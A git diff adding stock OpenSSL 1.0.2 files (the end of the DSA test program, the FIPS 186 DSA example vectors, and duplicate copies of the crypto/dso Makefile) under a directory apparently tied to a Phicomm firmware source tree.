+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+    ERR_load_crypto_strings();
+    RAND_seed(rnd_seed, sizeof rnd_seed);
+
+    BIO_printf(bio_err, "test generation of DSA parameters\n");
+
+    BN_GENCB_set(&cb, dsa_cb, bio_err);
+    if (((dsa = DSA_new()) == NULL) || !DSA_generate_parameters_ex(dsa, 512,
+                                                                   seed, 20,
+                                                                   &counter,
+                                                                   &h, &cb))
+        goto end;
+
+    BIO_printf(bio_err, "seed\n");
+    for (i = 0; i < 20; i += 4) {
+        BIO_printf(bio_err, "%02X%02X%02X%02X ",
+                   seed[i], seed[i + 1], seed[i + 2], seed[i + 3]);
+    }
+    BIO_printf(bio_err, "\ncounter=%d h=%ld\n", counter, h);
+
+    DSA_print(bio_err, dsa, 0);
+    if (counter != 105) {
+        BIO_printf(bio_err, "counter should be 105\n");
+        goto end;
+    }
+    if (h != 2) {
+        BIO_printf(bio_err, "h should be 2\n");
+        goto end;
+    }
+
+    i = BN_bn2bin(dsa->q, buf);
+    j = sizeof(out_q);
+    if ((i != j) || (memcmp(buf, out_q, i) != 0)) {
+        BIO_printf(bio_err, "q value is wrong\n");
+        goto end;
+    }
+
+    i = BN_bn2bin(dsa->p, buf);
+    j = sizeof(out_p);
+    if ((i != j) || (memcmp(buf, out_p, i) != 0)) {
+        BIO_printf(bio_err, "p value is wrong\n");
+        goto end;
+    }
+
+    i = BN_bn2bin(dsa->g, buf);
+    j = sizeof(out_g);
+    if ((i != j) || (memcmp(buf, out_g, i) != 0)) {
+        BIO_printf(bio_err, "g value is wrong\n");
+        goto end;
+    }
+
+    dsa->flags |= DSA_FLAG_NO_EXP_CONSTTIME;
+    DSA_generate_key(dsa);
+    DSA_sign(0, str1, 20, sig, &siglen, dsa);
+    if (DSA_verify(0, str1, 20, sig, siglen, dsa) == 1)
+        ret = 1;
+
+    dsa->flags &= ~DSA_FLAG_NO_EXP_CONSTTIME;
+    DSA_generate_key(dsa);
+    DSA_sign(0, str1, 20, sig, &siglen, dsa);
+    if (DSA_verify(0, str1, 20, sig, siglen, dsa) == 1)
+        ret = 1;
+
+ end:
+    if (!ret)
+        ERR_print_errors(bio_err);
+    if (dsa != NULL)
+        DSA_free(dsa);
+    CRYPTO_cleanup_all_ex_data();
+    ERR_remove_thread_state(NULL);
+    ERR_free_strings();
+    CRYPTO_mem_leaks(bio_err);
+    if (bio_err != NULL) {
+        BIO_free(bio_err);
+        bio_err = NULL;
+    }
+# ifdef OPENSSL_SYS_NETWARE
+    if (!ret)
+        printf("ERROR\n");
+# endif
+    EXIT(!ret);
+    return (0);
+}
+
+static int MS_CALLBACK dsa_cb(int p, int n, BN_GENCB *arg)
+{
+    char c = '*';
+    static int ok = 0, num = 0;
+
+    if (p == 0) {
+        c = '.';
+        num++;
+    };
+    if (p == 1)
+        c = '+';
+    if (p == 2) {
+        c = '*';
+        ok++;
+    }
+    if (p == 3)
+        c = '\n';
+    BIO_write(arg->arg, &c, 1);
+    (void)BIO_flush(arg->arg);
+
+    if (!ok && (p == 0) && (num > 1)) {
+        BIO_printf((BIO *)arg, "error in dsatest\n");
+        return 0;
+    }
+    return 1;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/fips186a.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/fips186a.txt
new file mode 100644
index 0000000..3a2e0a0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/fips186a.txt
@@ -0,0 +1,122 @@
+The origional FIPE 180 used SHA-0 (FIPS 180) for its appendix 5
+examples.  This is an updated version that uses SHA-1 (FIPS 180-1)
+supplied to me by Wei Dai
+--
+		     APPENDIX 5. EXAMPLE OF THE DSA
+
+
+This appendix is for informational purposes only and is not required to meet
+the standard.
+
+Let L = 512 (size of p).  The values in this example are expressed in
+hexadecimal notation.  The p and q given here were generated by the prime
+generation standard described in appendix 2 using the 160-bit SEED:
+
+          d5014e4b 60ef2ba8 b6211b40 62ba3224 e0427dd3
+
+With this SEED, the algorithm found p and q when the counter was at 105.
+
+x was generated by the algorithm described in appendix 3, section 3.1, using
+the SHA to construct G (as in appendix 3, section 3.3) and a 160-bit XSEED:
+
+XSEED =   
+
+	bd029bbe 7f51960b cf9edb2b 61f06f0f eb5a38b6
+
+t =
+	67452301 EFCDAB89 98BADCFE 10325476 C3D2E1F0
+
+x = G(t,XSEED) mod q
+
+k was generated by the algorithm described in appendix 3, section 3.2, using
+the SHA to construct G (as in appendix 3, section 3.3) and a 160-bit KSEED:
+
+KSEED =
+
+	687a66d9 0648f993 867e121f 4ddf9ddb 01205584
+
+t =
+	EFCDAB89 98BADCFE 10325476 C3D2E1F0 67452301
+
+k = G(t,KSEED) mod q
+
+Finally:
+
+h = 2
+
+p =
+	8df2a494 492276aa 3d25759b b06869cb eac0d83a fb8d0cf7
+	cbb8324f 0d7882e5 d0762fc5 b7210eaf c2e9adac 32ab7aac
+	49693dfb f83724c2 ec0736ee 31c80291
+
+
+q =
+	c773218c 737ec8ee 993b4f2d ed30f48e dace915f
+
+
+g =
+	626d0278 39ea0a13 413163a5 5b4cb500 299d5522 956cefcb
+	3bff10f3 99ce2c2e 71cb9de5 fa24babf 58e5b795 21925c9c
+	c42e9f6f 464b088c c572af53 e6d78802
+
+
+x =
+	2070b322 3dba372f de1c0ffc 7b2e3b49 8b260614
+
+
+k =
+	358dad57 1462710f 50e254cf 1a376b2b deaadfbf
+
+
+kinv = 
+
+	0d516729 8202e49b 4116ac10 4fc3f415 ae52f917
+
+M = ASCII form of "abc" (See FIPS PUB 180-1, Appendix A)
+
+SHA(M) =  
+
+	a9993e36 4706816a ba3e2571 7850c26c 9cd0d89d
+
+
+y =
+
+	19131871 d75b1612 a819f29d 78d1b0d7 346f7aa7 7bb62a85 
+	9bfd6c56 75da9d21 2d3a36ef 1672ef66 0b8c7c25 5cc0ec74
+	858fba33 f44c0669 9630a76b 030ee333
+
+
+r =
+	8bac1ab6 6410435c b7181f95 b16ab97c 92b341c0
+
+s =
+	41e2345f 1f56df24 58f426d1 55b4ba2d b6dcd8c8
+
+
+w =
+	9df4ece5 826be95f ed406d41 b43edc0b 1c18841b
+
+
+u1 =
+	bf655bd0 46f0b35e c791b004 804afcbb 8ef7d69d
+
+
+u2 =
+	821a9263 12e97ade abcc8d08 2b527897 8a2df4b0
+
+
+gu1 mod p =
+
+	51b1bf86 7888e5f3 af6fb476 9dd016bc fe667a65 aafc2753
+	9063bd3d 2b138b4c e02cc0c0 2ec62bb6 7306c63e 4db95bbf
+	6f96662a 1987a21b e4ec1071 010b6069
+
+
+yu2 mod p =
+
+	8b510071 2957e950 50d6b8fd 376a668e 4b0d633c 1e46e665
+	5c611a72 e2b28483 be52c74d 4b30de61 a668966e dc307a67 
+	c19441f4 22bf3c34 08aeba1f 0a4dbec7
+
+v =
+	8bac1ab6 6410435c b7181f95 b16ab97c 92b341c0
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile
new file mode 100644
index 0000000..fb2709e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile
@@ -0,0 +1,150 @@
+#
+# OpenSSL/crypto/dso/Makefile
+#
+
+DIR=	dso
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dso_dl.c dso_dlfcn.c dso_err.c dso_lib.c dso_null.c \
+	dso_openssl.c dso_win32.c dso_vms.c dso_beos.c
+LIBOBJ= dso_dl.o dso_dlfcn.o dso_err.o dso_lib.o dso_null.o \
+	dso_openssl.o dso_win32.o dso_vms.o dso_beos.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dso.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dso_beos.o: ../../e_os.h ../../include/openssl/bio.h
+dso_beos.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_beos.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_beos.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_beos.o: ../../include/openssl/opensslconf.h
+dso_beos.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_beos.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_beos.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_beos.c
+dso_dl.o: ../../e_os.h ../../include/openssl/bio.h
+dso_dl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_dl.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_dl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_dl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_dl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_dl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_dl.o: ../cryptlib.h dso_dl.c
+dso_dlfcn.o: ../../e_os.h ../../include/openssl/bio.h
+dso_dlfcn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_dlfcn.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_dlfcn.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_dlfcn.o: ../../include/openssl/opensslconf.h
+dso_dlfcn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_dlfcn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_dlfcn.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_dlfcn.c
+dso_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dso_err.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_err.o: dso_err.c
+dso_lib.o: ../../e_os.h ../../include/openssl/bio.h
+dso_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_lib.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_lib.o: ../cryptlib.h dso_lib.c
+dso_null.o: ../../e_os.h ../../include/openssl/bio.h
+dso_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_null.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_null.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_null.o: ../../include/openssl/opensslconf.h
+dso_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_null.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_null.c
+dso_openssl.o: ../../e_os.h ../../include/openssl/bio.h
+dso_openssl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_openssl.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_openssl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_openssl.o: ../../include/openssl/opensslconf.h
+dso_openssl.o: ../../include/openssl/opensslv.h
+dso_openssl.o: ../../include/openssl/ossl_typ.h
+dso_openssl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_openssl.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_openssl.c
+dso_vms.o: ../../e_os.h ../../include/openssl/bio.h
+dso_vms.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_vms.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_vms.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_vms.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_vms.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_vms.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_vms.o: ../cryptlib.h dso_vms.c
+dso_win32.o: ../../e_os.h ../../include/openssl/bio.h
+dso_win32.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_win32.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_win32.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_win32.o: ../../include/openssl/opensslconf.h
+dso_win32.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_win32.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_win32.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_win32.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.bak
new file mode 100644
index 0000000..fb2709e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.bak
@@ -0,0 +1,150 @@
+#
+# OpenSSL/crypto/dso/Makefile
+#
+
+DIR=	dso
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dso_dl.c dso_dlfcn.c dso_err.c dso_lib.c dso_null.c \
+	dso_openssl.c dso_win32.c dso_vms.c dso_beos.c
+LIBOBJ= dso_dl.o dso_dlfcn.o dso_err.o dso_lib.o dso_null.o \
+	dso_openssl.o dso_win32.o dso_vms.o dso_beos.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dso.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dso_beos.o: ../../e_os.h ../../include/openssl/bio.h
+dso_beos.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_beos.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_beos.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_beos.o: ../../include/openssl/opensslconf.h
+dso_beos.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_beos.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_beos.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_beos.c
+dso_dl.o: ../../e_os.h ../../include/openssl/bio.h
+dso_dl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_dl.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_dl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_dl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_dl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_dl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_dl.o: ../cryptlib.h dso_dl.c
+dso_dlfcn.o: ../../e_os.h ../../include/openssl/bio.h
+dso_dlfcn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_dlfcn.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_dlfcn.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_dlfcn.o: ../../include/openssl/opensslconf.h
+dso_dlfcn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_dlfcn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_dlfcn.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_dlfcn.c
+dso_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dso_err.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_err.o: dso_err.c
+dso_lib.o: ../../e_os.h ../../include/openssl/bio.h
+dso_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_lib.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_lib.o: ../cryptlib.h dso_lib.c
+dso_null.o: ../../e_os.h ../../include/openssl/bio.h
+dso_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_null.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_null.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_null.o: ../../include/openssl/opensslconf.h
+dso_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_null.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_null.c
+dso_openssl.o: ../../e_os.h ../../include/openssl/bio.h
+dso_openssl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_openssl.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_openssl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_openssl.o: ../../include/openssl/opensslconf.h
+dso_openssl.o: ../../include/openssl/opensslv.h
+dso_openssl.o: ../../include/openssl/ossl_typ.h
+dso_openssl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_openssl.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_openssl.c
+dso_vms.o: ../../e_os.h ../../include/openssl/bio.h
+dso_vms.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_vms.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_vms.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_vms.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_vms.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_vms.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_vms.o: ../cryptlib.h dso_vms.c
+dso_win32.o: ../../e_os.h ../../include/openssl/bio.h
+dso_win32.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_win32.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_win32.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_win32.o: ../../include/openssl/opensslconf.h
+dso_win32.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_win32.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_win32.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_win32.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.save
new file mode 100644
index 0000000..fb2709e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dso/Makefile.save
@@ -0,0 +1,150 @@
+#
+# OpenSSL/crypto/dso/Makefile
+#
+
+DIR=	dso
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= dso_dl.c dso_dlfcn.c dso_err.c dso_lib.c dso_null.c \
+	dso_openssl.c dso_win32.c dso_vms.c dso_beos.c
+LIBOBJ= dso_dl.o dso_dlfcn.o dso_err.o dso_lib.o dso_null.o \
+	dso_openssl.o dso_win32.o dso_vms.o dso_beos.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= dso.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+dso_beos.o: ../../e_os.h ../../include/openssl/bio.h
+dso_beos.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_beos.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_beos.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_beos.o: ../../include/openssl/opensslconf.h
+dso_beos.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_beos.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_beos.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_beos.c
+dso_dl.o: ../../e_os.h ../../include/openssl/bio.h
+dso_dl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_dl.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_dl.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_dl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_dl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_dl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_dl.o: ../cryptlib.h dso_dl.c
+dso_dlfcn.o: ../../e_os.h ../../include/openssl/bio.h
+dso_dlfcn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_dlfcn.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_dlfcn.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_dlfcn.o: ../../include/openssl/opensslconf.h
+dso_dlfcn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_dlfcn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_dlfcn.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_dlfcn.c
+dso_err.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+dso_err.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_err.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_err.o: dso_err.c
+dso_lib.o: ../../e_os.h ../../include/openssl/bio.h
+dso_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_lib.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_lib.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+dso_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+dso_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+dso_lib.o: ../cryptlib.h dso_lib.c
+dso_null.o: ../../e_os.h ../../include/openssl/bio.h
+dso_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_null.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+dso_null.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+dso_null.o: ../../include/openssl/opensslconf.h
+dso_null.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+dso_null.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+dso_null.o: ../../include/openssl/symhacks.h ../cryptlib.h dso_null.c
+dso_openssl.o: ../../e_os.h ../../include/openssl/bio.h
+dso_openssl.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+dso_openssl.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
